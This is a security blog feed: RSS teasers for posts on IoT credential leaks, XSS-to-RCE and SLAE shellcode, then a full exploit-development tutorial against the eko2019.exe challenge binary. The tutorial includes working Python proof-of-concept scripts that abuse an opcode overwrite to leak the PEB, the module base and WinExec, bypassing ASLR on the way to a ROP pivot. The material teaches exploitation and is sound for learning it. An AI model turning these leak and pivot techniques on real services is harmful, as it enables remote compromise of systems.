
NotSoSmartConfig: broadcasting WiFi credentials Over-The-Air

20 April 2020 at 16:00
During one of our latest IoT Penetration Tests we tested a device based on the ESP32 SoC by Espressif. While assessing the activation procedure we faced for the first time a beautiful yet dangerous protocol: SmartConfig. The idea behind the SmartConfig protocol is to allow an unconfigured IoT device to connect to a WiFi network without requiring a direct connection between the configurator and the device itself – I know, it’s scary.

Tabletopia: from XSS to RCE

By: voidsec
8 April 2020 at 15:02

During this period of social isolation, a friend of mine proposed playing some online “board games”. He proposed “Tabletopia”: a cool sandbox virtual table with more than 800 board games. Tabletopia is accessible both from its own website and from the Steam platform. While my friends decided to play from their browser, I’ve opted […]

The post Tabletopia: from XSS to RCE appeared first on VoidSec.

SLAE – Assignment #7: Custom Shellcode Crypter

By: voidsec
2 April 2020 at 14:55

Assignment #7: Custom Shellcode Crypter The seventh and last SLAE assignment requires the creation of a custom shellcode crypter. Since I had to implement an entire encryption scheme, both in Python as a helper and in assembly as the main decryption routine, I’ve opted for something simple. I’ve chosen the Tiny Encryption Algorithm (TEA) as it does […]

The post SLAE – Assignment #7: Custom Shellcode Crypter appeared first on VoidSec.

SLAE – Assignment #6: Polymorphic Shellcode

By: voidsec
2 April 2020 at 14:39

Assignment #6: Polymorphic Shellcode The sixth SLAE assignment requires the creation of three different polymorphic shellcode versions starting from published Shell-Storm examples. I’ve decided to examine these three: http://shell-storm.org/shellcode/files/shellcode-752.php – linux/x86 execve (“/bin/sh”) – 21 bytes http://shell-storm.org/shellcode/files/shellcode-624.php – linux/x86 setuid(0) + chmod(“/etc/shadow”,0666) – 37 bytes http://shell-storm.org/shellcode/files/shellcode-231.php – linux/x86 open cd-rom loop (follows “/dev/cdrom” symlink) […]

The post SLAE – Assignment #6: Polymorphic Shellcode appeared first on VoidSec.

Exploit Development: Rippity ROPpity The Stack Is Our Property - Blue Frost Security eko2019.exe Full ASLR and DEP Bypass on Windows 10 x64

27 March 2020 at 00:00

Introduction

I have recently been spending the last few days gaining more experience with reverse engineering to complement my exploit development background. During this time, I stumbled across this challenge, put on by Blue Frost Security earlier in the year, which requires both reverse engineering and exploit development skills. Although I would by no means consider myself an expert in reverse engineering, I decided this would be a nice way to become more well versed with the entire development lifecycle, from identifying vulnerabilities through reverse engineering to developing a functioning exploit.

Before we begin, I will be using Ghidra and IDA Freeware 64-bit to reverse the eko2019.exe application, and WinDbg to develop the exploit. I prefer IDA for viewing the execution of a program, but the Ghidra decompiler for viewing the code the program is comprised of. This exploit will be developed on Windows 10 x64 RS2, simply because I already had a VM with this OS ready to go. The exploit will work up to Windows 10 x64 RS6 (the 1903 build), although the offsets between addresses will differ.

Reverse, Reverse!

Starting the application, we can clearly see the server has echoed some text into the command prompt where the server is running.

After some investigation, it seems this application binds to port 54321. Looking at the text in the command prompt window leads me to believe printf(), or similar functions, must have been called in order for the application to display this text. I am also inclined to believe that these print functions must be located somewhere around the routine that is responsible for opening up a socket on port 54321 and accepting messages. Let’s crack open eko2019.exe in IDA and see if our hypothesis is correct.

By opening the Strings subview in IDA, we can identify all of the strings within eko2019.exe.

As we can see from the above image, we have identified a string that seems like a good place to start! "[+] Message received: %i bytes\n" is indicative that the server has received a connection and message from the client (us). The function/code that is responsible for incoming connections may be around where this string is located. By double-clicking on .data:000000014000C0A8 (the address of this string), we can get a better look at the internals of the eko2019.exe application, as shown below.

Perfect! We have identified where the string "[+] Message received: %i bytes\n" resides. In IDA, we have the ability to cross reference where a function, routine, instruction, etc. resides. This functionality is outlined by the DATA XREF: sub_1400011E0+11E↑o comment (a cross reference of data, in this case) in the above image. If we double click on sub_1400011E0+11E↑o in the DATA XREF comment, we will land on the function in which the "[+] Message received: %i bytes\n" string resides.

Nice! As we can see from the above image, the place in which this string resides is location (loc) loc_1400012CA. If we trace execution back to where it originated, we can see that the function we are inside is sub_1400011E0 (eko2019.exe+0x11e0).

After looking around this function for a while, it is evident this is the function that handles connections and messages! Knowing this, let’s head over to Ghidra and decompile this function to see what is going on.

Opening the function in Ghidra’s decompiler, a few things stand out to us, as outlined in the image below.

Number one, the local_258 variable is initialized with the return value of the recv() function. Using this function, eko2019.exe will “read in” the data sent from the client. The recv() call is made with the following arguments:

  • A socket file descriptor, param_1, which is inherited from the void FUN_1400011e0 function.
  • A pointer to where the buffer that was received will be written to (local_28).
  • The specified length of the receiving buffer (local_28), which is 0x10 hexadecimal bytes (16 decimal bytes).
  • Zero, which represents what flags should be implemented (none in this case).

What this means is that the number of bytes received by the recv() call (its return value) will be stored in the variable local_258.

This is how the call looks, disassembled, within IDA.

The next line of code after the value of local_258 is set makes a call to printf(), which displays a message indicating the “header” has been received, and prints the value of local_258.

printf(s__[+]_Header_received:_%i_bytes_14000c008,(ulonglong)local_258)

We can interpret this behavior as follows: eko2019.exe expects to receive a header before the “message” portion of the client request. This header must be 0x10 hexadecimal bytes (16 decimal bytes) in length. This is the first “check” the application makes on our request, thus being the first “check” we must bypass.

Number two, after the header is received by the program, the variable that holds the buffer received by the previous recv() call (local_28) is compared to the string constant 0x393130326f6b45, or Eko2019 in text form, in an if statement.

if (local_28 == 0x393130326f6b45) {

Taking a look at the data type of local_28, declared at the beginning of this function, we notice it is a longlong. This means the variable should be 8 bytes in total. We notice, however, that 0x393130326f6b45 is only 7 bytes in length. This indicates that the string Eko2019 should be null terminated; the null character provides the eighth byte we need.
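
To see why this comparison amounts to a check for a null terminated “Eko2019” string, we can pack the constant ourselves (this snippet is purely illustrative and not part of the exploit):

import struct

# The constant from the if statement, packed as a little-endian QWORD
header_check = struct.pack('<Q', 0x393130326f6b45)

print(repr(header_check))   # 'Eko2019\x00' - the null byte supplies the eighth byte

# This is exactly the first 8 bytes of the header we will send later
assert header_check == b"\x45\x6B\x6F\x32\x30\x31\x39\x00"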

This is how this check is executed, in IDA.

Number three, the variable local_20 is compared to 0x201 (513 decimal).

if (local_20 < 0x201) {

Where does this variable come from you ask? If we take a look two lines down, we can see that local_20 is used in another recv() call, as the length of the buffer that stores the request.

local_258 = recv(param_1,local_238,(uint)(ushort)local_20,0);

The recv() call here again uses the same type of arguments as the previous call and reuses the variable local_258. Let’s take a look at the declaration of the variable local_238 in the above recv() function call, as it hasn’t been referenced in this blog post yet.

char local_238 [512];

This allocates a buffer of 512 bytes. Looking at the above recv() call, here is how the arguments are lined up:

  • A socket file descriptor, param_1, which is inherited from the void FUN_1400011e0 function is used again.
  • A pointer to where the buffer that was received will be written to (local_238 this time, which is 512 bytes).
  • The specified length, which is represented by local_20. This variable was used in the check implemented above, which looks to see if the size of the data received in the buffer is 512 bytes or less.
  • Zero, which represents what flags should be implemented (none in this case).

The last check looks to see if our message is sent in a multiple of 8 (aka aligned properly with a full 8 byte address). This check can be identified with relative ease.

uVar2 = (int)local_258 >> 0x1f & 7;
if ((local_258 + uVar2 & 7) == uVar2) {
          iVar1 = printf(s__[+]_Remote_message_(%i):_'%s'_14000c0f8,(ulonglong)DAT_14000c000, local_238);

The value of local_258, which at this point is the size of our message (not the header), is shifted right by 0x1f via the bitwise operator >>. This value is then bitwise AND’d with 7 decimal. This is what the result would look like if our message size were 0x200 bytes (512 decimal), which is a known multiple of 8.

This value gets stored in the uVar2 variable, which would now have a value of 0, based on the above photo.

If we would like our message to go through, it seems as though we are going to need to satisfy the above if statement. The if statement adds the value of local_258 (presumably 0x200 in this example) to the value of uVar2, while using bitwise AND on the result of the addition with 7 decimal. If the total result is equal to uVar2, which is 0, the message is sent!

As we can see, the statement (local_258 + uVar2 & 7) == uVar2 is indeed true, meaning we can send our message!

Let’s try another scenario with a value that is not a multiple of 8, like 0x199.

Using the same formula above, with the bitwise shift right operator, we yield a value of 0.

Taking this value of 0, adding it to 0x199, and using bitwise AND on the result yields a nonzero value (1).

This means the if statement would have failed, and our message would not have gone through (since 0x199 is not a multiple of 8)!
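
To convince ourselves of how this check behaves, we can reproduce the arithmetic in a few lines of Python (illustrative only):

def passes_alignment_check(size):
    # Mirrors: uVar2 = (int)local_258 >> 0x1f & 7;  if ((local_258 + uVar2 & 7) == uVar2)
    uvar2 = (size >> 0x1f) & 7          # 0 for any non-negative size
    return ((size + uvar2) & 7) == uvar2

print(passes_alignment_check(0x200))    # True  - 0x200 is a multiple of 8
print(passes_alignment_check(0x199))    # False - 0x199 is not a multiple of 8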

In total, here are the checks we must bypass to send our buffer:

  1. A 16 byte header (0x10 hexadecimal) with the string 0x393130326f6b45, which is null terminated, as the first 8 bytes (remember, the first 16 bytes of the request are interpreted as the header. This means we need 8 additional bytes appended to the null terminated string).
  2. Our message (not counting the header) must be 512 bytes (0x200 hexadecimal bytes) or less
  3. Our message’s length must be a multiple of 8 (the size of an x64 memory address)

Now that we have the ability to bypass the checks eko2019.exe makes on our buffer (which is comprised of the header and message), we can successfully interact with the server! The only question remains- where exactly does this buffer end up when it is received by the program? Will we even be able to locate this buffer? Is this only a partial write? Let’s take a look at the following snippet of code to find out.

local_250[0] = FUN_140001170;
hProcess = GetCurrentProcess();
WriteProcessMemory(hProcess,FUN_140001000,local_250,8,&local_260);

The Windows API function GetCurrentProcess() first retrieves a handle to the current process (eko2019.exe). This handle is passed to the call to WriteProcessMemory(), which writes data to an area of memory in a specified process.

According to Microsoft Docs (formerly known as MSDN), a call to WriteProcessMemory() is defined as follows.

BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesWritten
);
  • hProcess in this case will be set to the current process (eko2019.exe).
  • lpBaseAddress is set to the function inside of eko2019.exe, sub_140001000 (eko2019.exe+0x1000). This will be where WriteProcessMemory() starts writing memory to.
  • lpBuffer is where the memory written to lpBaseAddress will be taken from. In our case, the buffer will be taken from function sub_140001170 (eko2019.exe+0x1170), which is represented by the variable local_250.
  • nSize is statically assigned a value of 8, meaning this function call will write one QWORD.
  • *lpNumberOfBytesWritten is a pointer to a variable that will receive the number of bytes written.

Now that we have a better idea of what will be written where, let’s see how this all looks in IDA.

There is something very interesting going on in the above image. Let’s start with the following instructions.

lea rcx, unk_14000E520
mov rcx, [rcx+rax*8]
call sub_140001170

If you recall from the WriteProcessMemory() arguments, the buffer that WriteProcessMemory() will write from actually comes from the function sub_140001170, which is eko2019.exe+0x1170 (via the local_250 variable). From the above assembly code, we can see how and where this function is utilized!

Looking at the assembly code, the address of the unknown data, unk_14000E520, is placed into the RCX register. The value pointed to by this location (the actual data inside the unknown data type), indexed by RAX scaled by 8, is then placed into RCX. RCX is then passed as a function parameter (due to the x64 __fastcall calling convention) to the function sub_140001170 (eko2019.exe+0x1170).

This function, sub_140001170 (eko2019.exe+0x1170), will then return its value. The returned value of this function is going to be what is written to memory, via the WriteProcessMemory() function call.

Recall from the WriteProcessMemory() function arguments earlier that the location to which the return value of sub_140001170 will be written is sub_140001000 (eko2019.exe+0x1000). What is most interesting is that this location is actually called directly after!

call sub_140001000

Let’s see what sub_140001000 looks like in IDA.

Essentially, when sub_140001000 (eko2019.exe+0x1000) is called after the WriteProcessMemory() routine, it will land on and execute whatever value the sub_140001170 (eko2019.exe+0x1170) function returns, along with some NOPS and a return.

Can we leverage this functionality? Let’s find out!

Stepping Stones

Now that we know what will be written where, let’s set a breakpoint on this location in memory in WinDbg, and start stepping through each instruction while dumping the contents of the registers in use. This will give us a clearer understanding of the behavior of eko2019.exe.

Here is the proof of concept we will be using, based on the checks we have bypassed earlier.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes
exploit += "\x41" * 512

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)
s.recv(1024)
s.close()

Before sending this proof of concept, let’s make sure a breakpoint is set at eko2019.exe+0x1330 (sub_140001330), as this is where we should land after our header is sent.

After sending our proof of concept, we can see we hit our breakpoint.

In addition to execution pausing, it seems as though we also control 0x1f8 bytes on the stack (504 decimal).

Let’s keep stepping through instructions, to see where we get!

After stepping through a few instructions, execution lands at this instruction, shown below.

lea rcx,[eko2019+0xe520 (00007ff6`6641e520)]

This instruction loads the address of eko2019.exe+0xe520 into RCX. Looking back, we recall the following disassembly corresponds to our current instruction.

lea rcx, unk_14000E520
mov rcx, [rcx+rax*8]
call sub_140001170

If we examine what is located at eko2019.exe+0xe520, we come across some interesting data, shown below.

It seems as though this value, 00488b01c3c3c3c3, will be loaded into RCX. This is very interesting, as we know that c3 is the opcode for a “return” instruction. What is of even more interest is that the first byte is set to zero. Since we know RAX is going to be tacked on to this value, it seems as though whatever is in RAX is going to complete this string! Let’s step through the instruction that does this.

RAX is currently set to 0x3e

The following instruction is executed, as shown below.

mov rcx, [rcx+rax*8]

RCX now contains the value loaded from [RCX + RAX*8]!

Nice! This value is now going to be passed to the sub_140001170 (eko2019.exe+0x1170) function.

As we know, most of the time when a function executes, the value it returns is placed in the accumulator register (RAX in this case). Take a look at the image below, which shows what value the sub_140001170 (eko2019.exe+0x1170) function returns.

Interesting! It seems as though the call to sub_140001170 (eko2019.exe+0x1170) inverted our bytes!

Based on the research we have done previously, it is evident that this is the QWORD that is going to be written to sub_140001000 via the WriteProcessMemory() routine!

As we can see below, the next item up for execution (that is of importance) is the GetCurrentProcess() routine, which will return a handle to the current process (eko2019.exe) into RAX, similarly to how the last function returned its value into RAX.

Taking a look at RAX, we can see a value of ffffffffffffffff. This represents the current process! For instance, if we wanted to call WriteProcessMemory() outside of a debugger in the C programming language, specifying the first argument as ffffffffffffffff would represent the current process, without even needing to obtain a handle to the current process! This is because GetCurrentProcess() technically returns a “pseudo handle” to the current process. A pseudo handle is the special constant (HANDLE)-1, or ffffffffffffffff.
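
As a small aside (illustrative only, Windows-only, and not part of the exploit), you can see the same pseudo handle from Python via ctypes:

import ctypes

# GetCurrentProcess() returns the pseudo handle (HANDLE)-1 rather than a real handle
handle = ctypes.windll.kernel32.GetCurrentProcess()

# Viewed as an unsigned 64-bit value, -1 is ffffffffffffffff
print(hex(handle & 0xFFFFFFFFFFFFFFFF))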

All that is left now is to step through until the call to WriteProcessMemory(), to verify everything will be written as expected.

Now that WriteProcessMemory() is about to be called- let’s take a look at the arguments that will be used in the function call.

The fifth argument is located at RSP + 0x20; this is where the __fastcall calling convention places arguments once the first four registers are used. Each subsequent argument is placed 8 bytes after the last (e.g. RSP + 0x28, RSP + 0x30, etc. Remember, we are doing hexadecimal math here!).

Awesome! As we can see from the above image, WriteProcessMemory() is going to write the value returned by sub_140001170 (eko2019.exe+0x1170), which is located in the R8 register, to the location of sub_140001000 (eko2019.exe+0x1000).

After this function is executed, the location to which WriteProcessMemory() wrote to is called, as outlined by the image below.

Cool! This function received the buffer from the sub_140001170 (eko2019.exe+0x1170) function call. When those bytes are interpreted by the disassembler, you can see from the image above- this 8 byte QWORD is interpreted as an instruction that moves the value pointed to by RCX into RAX (with the NOPs we previously discovered with IDA)! The function returns the value in RAX and that is the end of execution!

Is there any way we can abuse this functionality?

Curiosity Killed The Cat? No, It Just Turned The Application Into One Big Info Leak

We know that when sub_140001000 (eko2019.exe+0x1000) is called, the value pointed to by RCX is placed into RAX and then the function returns this value. Since the function is done executing, and the program accepts and returns network data to clients, it would be logical that the value in RAX may be returned to the client over the network connection. After all, this is a client/server architecture. Let’s test this theory by updating our proof of concept.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes
exploit += "\x41" * 512

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Can we receive any data back?
test = s.recv(1024)
test_unpack = struct.unpack_from('<Q', test)
test_index = test_unpack[0]

print "[+] Did we receive any data back from the server? If so, here it is: {0}".format(hex(test_index))

# Closing the connection
s.close()

What this updated code does is read up to 1024 bytes from the server response. The struct.unpack_from() function then interprets the data received back from the server as an unsigned long long (essentially an 8 byte integer). This data is then indexed at its “first” position, formatted as hex, and printed!
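
As a quick illustration of what that unpacking does (the response bytes below are made up for the example):

import struct

# Suppose the server sent back 0x21d as a little-endian QWORD
response = b"\x1d\x02\x00\x00\x00\x00\x00\x00"

leaked = struct.unpack_from('<Q', response)[0]
print(hex(leaked))   # 0x21d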

If you recall from the previous image in the last section that outlined the mov rax, qword ptr [rcx] operation in the sub_140001000 function, you will see the value that was moved into RAX was 0x21d. If everything goes as planned, when we run this script, that value should be printed to the screen! Let’s test it out.

Awesome! As you can see, we were able to extract and view the contents of the returned value (RAX) of the function call to sub_140001000 (eko2019.exe+0x1000) remotely! This means that we can obtain some type of information leakage (although it is not particularly useful at the moment).

As reverse engineers, vulnerability researchers, and exploit developers, we are taught never to accept things at face value! Although eko2019.exe tells us that we are not supposed to send a message longer than 512 bytes, let’s see what happens when we send a value greater than 512! Adhering to the restriction about our data being a multiple of 8, let’s try sending 528 bytes (in just the message) to the server!

Interesting! The application crashes! However, before you jump to conclusions- this is not the result of a buffer overflow. The root cause is something different! Let’s now identify where this crash occurs and why.

Let’s reattach WinDbg to eko2019.exe and view the execution right before the call to sub_140001170 (eko2019.exe+0x1170).

Again, execution is paused right before the call to sub_140001170 (eko2019.exe+0x1170).

At this point, the value of RAX is about to be added to the following data again.

Let’s check out the contents of the RAX register, to see what is going to get tacked on here!

Very interesting! It seems as though we now actually control the byte in RAX- just by increasing the number of bytes sent! Now, if we step through the WriteProcessMemory() function call that will write this string and call it later on, we can see that this is why the program crashes.

As you can see, execution of our program landed right before the move instruction, which takes the contents pointed to by RCX and places it into RAX. As we can see below, this was not an access violation because of DEP- but because it is obviously an invalid pointer. DEP doesn’t apply here, because we are not executing from the stack.

This is all fine and dandy- but the REAL issue can be identified by looking at the state of the registers.

This is the exciting part- we actually control the contents of the RCX register! This essentially gives us an arbitrary read primitive, due to the fact we can control what gets loaded into RCX, extract its contents into RAX, and return it remotely to the client! There are four things we need to take into consideration:

  1. Where in our message buffer are the bytes that get loaded into RCX?
  2. What exactly should we load into RCX?
  3. Where is the byte that comes before the mov rax, qword ptr [rcx] instruction located?
  4. What should we change said byte to?

Let’s address numbers three and four in the above list first.

Bytes Bytes Baby

In a previous post about ROP, we talked about the concept of byte splitting. Let’s apply that same concept here! For instance, \x41 is an opcode that, when placed in front of the opcodes \x48\x8b\x01 (which make up the move instruction in eko2019.exe we are talking about), does not produce a variant of said instruction.

Let’s put our brains to work for a second. We have an information leak currently- but we don’t have any use for it at the moment. As is common, let’s leverage this information leak to bypass ASLR! To do this, let’s start by trying to access the Process Environment Block, commonly referred to as the PEB, for the current process (eko2019.exe)! The PEB is the user mode representation of a process, similar to how _EPROCESS is the kernel mode representation of a process.

Why is this relevant, you ask? Since we have the ability to extract the value a location in memory points to, we should be able to use our byte splitting primitive to our advantage! The PEB for the current process can be accessed through a special segment register, GS, at an offset of 0x60. Recall from a previous pair of posts about kernel shellcode that a segment register is just a register used to access different types of data structures (such as the PEB of the current process). The PEB, as will be explained later, contains some very pertinent information that can be leveraged to turn our information leak into a full ASLR bypass.

We can potentially replace the \x41 in front of our previous mov rax, qword ptr [rcx] instruction, and change it to create a variant of said instruction, mov rax, qword ptr gs:[rcx]! This would also mean, however, that we would need to set RCX to 0x60 at the time of this instruction.

Recall that we have the ability to control RCX at this time! This is ideal, because we can use our ability to control RCX to load the value of 0x0000000000000060 into it- and access the GS segment register at this offset!

After some research, it seems as though the bytes \x65\x48\x8b\x01 are used to create the instruction mov rax, qword ptr gs:[rcx]. This means we need to replace the \x41 byte that caused our access violation with a \x65 byte! First, however, we need to identify where this byte is within our proof of concept.
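
If you have the Capstone disassembly engine installed, you can quickly sanity check that these bytes decode to the instruction we want (this snippet is just an optional verification step, not part of the exploit):

from capstone import Cs, CS_ARCH_X86, CS_MODE_64

md = Cs(CS_ARCH_X86, CS_MODE_64)

# \x65 is the GS segment-override prefix placed in front of the original \x48\x8b\x01 (mov rax, qword ptr [rcx])
for insn in md.disasm(b"\x65\x48\x8b\x01", 0):
    print("%s %s" % (insn.mnemonic, insn.op_str))   # mov rax, qword ptr gs:[rcx]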

Updating our proof of concept, we found that the byte we need to replace with \x65 is at an offset of 512 into our 528 byte buffer. Additionally, the bytes that control the value of RCX seem to come right after said byte! This was all found through trial and error.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

As you can see from the image below, when we hit the move operation, we have the correct instruction in place.

RAX now contains the value of PEB!

In addition, our remote client has been able to save the address of the PEB into a variable, which means we can always dynamically resolve this value. Note that this value will change each time the application (process) is restarted.

What is most devastating about identifying the PEB of eko2019.exe is that the base address for the current process (eko2019.exe in this case) is located at PEB+0x10.

Essentially, all we have to do is use our ability to control RCX to load the value of PEB+0x10 into it. At that point, the application will extract what PEB+0x10 points to into RAX. The data PEB+0x10 points to is the actual base virtual address for eko2019.exe! This value will then be returned to the client, via RAX. This will be done with a second request! Note that this time we do not need to access the GS segment register (in the second request). If you recall, before we accessed the GS segment register, the program naturally executed a mov rax, qword ptr [rcx] instruction. To ensure this is the instruction executed this time, we will use the byte we control to implement a NOP, sliding into the intended instruction.

As mentioned earlier, we will close our first connection to the server, and then make a second request! This update to the exploit development process is outlined in the updated proof of concept.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

We hit our NOP and then execute it, sliding into our intended instruction.

We execute the above instruction- and we see a virtual address has been loaded into RAX! This is presumably the base address of eko2019.exe.

To verify this, let’s check what the base address of eko2019.exe is in WinDbg.

Awesome! We have successfully extracted the base virtual address of eko2019.exe and stored it in a variable on the remote client.

This means that when we need to execute our code in the future, we can dynamically resolve our ROP gadgets via offsets, and ASLR will no longer be a problem! Only one question remains: how are we going to execute any code?

Mom, The Application Is Still Leaking!

For this blog post, we are going to pop calc.exe to verify code execution is possible. Since we are only going to execute calc.exe as our proof of concept, using the Windows API function WinExec() makes the most sense. This is much easier than going through a full VirtualProtect() function call to make our code executable, since all we need to do is pop calc.exe.

Since we already have the ability to dynamically resolve all of eko2019.exe’s virtual address space- let’s see if we can find any addresses within eko2019.exe that leak a pointer to kernel32.dll (where WinExec() resides) or WinExec() itself.

As you can see below, eko2019.exe+0x9010 actually leaks a pointer to WinExec()!

This is perfect, due to the fact we have a read primitive which extracts the value that a virtual address points to! In this case, eko2019.exe+0x9010 points to WinExec(). Again, we don’t need to push rcx or access any special registers like the GS segment register- we just want to extract the pointer in RCX (which we will fill with eko2019.exe+0x9010). Let’s update our proof of concept with a third request, to leak the address of WinExec() in kernel32.dll.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 3rd stage

# 16 total bytes
print "[+] Sending the third header..."
exploit_3 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_3 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_3 += "\x90"

# Padding to load eko2019.exe+0x9010
exploit_3 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_3 += struct.pack('<Q', base_address+0x9010)

# Message needs to be 528 bytes total
exploit_3 += "\x41" * (544-len(exploit_3))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_3)

# Indexing the response to view RAX (VA of kernel32!WinExec)
receive_3 = s.recv(1024)
kernel32_unpack = struct.unpack_from('<Q', receive_3)
kernel32_winexec = kernel32_unpack[0]

print "[+] kernel32!WinExec is located at: {0}".format(hex(kernel32_winexec))

# Close the connection
s.close()

Landing on the move instruction, we can see that the address of WinExec() is about to be extracted from RCX!

When this instruction executes, the value will be loaded into RAX and then returned to us (the client)!

Do What You Can, With What You Have, Where You Are- Teddy Roosevelt

Recall up until this point, we have the following primitives:

  1. Write primitive- we can control the value of RCX, one byte around our mov instruction, and we can control a lot of the stack.
  2. Read primitive- we have the ability to read in values of pointers.

Using our ability to control RCX, we may have a potential way to pivot back to the stack. If you can recall from earlier, when we first increased our number of bytes from 512 to 528 and the \x41 byte was accessed BEFORE the mov rax, qword ptr [rcx] instruction was executed (which resulted in an access violation and a subsequent crash), the disassembler didn’t interpret \x41 as part of the mov rax, qword ptr [rcx] instruction set- because that opcode doesn’t create a valid set of opcodes with said move instruction.

Investigating a little bit more, we can recall that our move instruction also ends with a ret, which will take the value located at RSP (the stack), and execute it. Since we can control RCX- if we could find a way to load RCX into RSP, we would return to that value and execute it, via the ret that exits the function call. What would make sense to us, is to load RCX with a ROP gadget that would add rsp, X (which would make RSP point into our user controlled portion of the stack) and then start executing there! The question still remains however- even though we can control RCX, how are we going to execute what is in it?

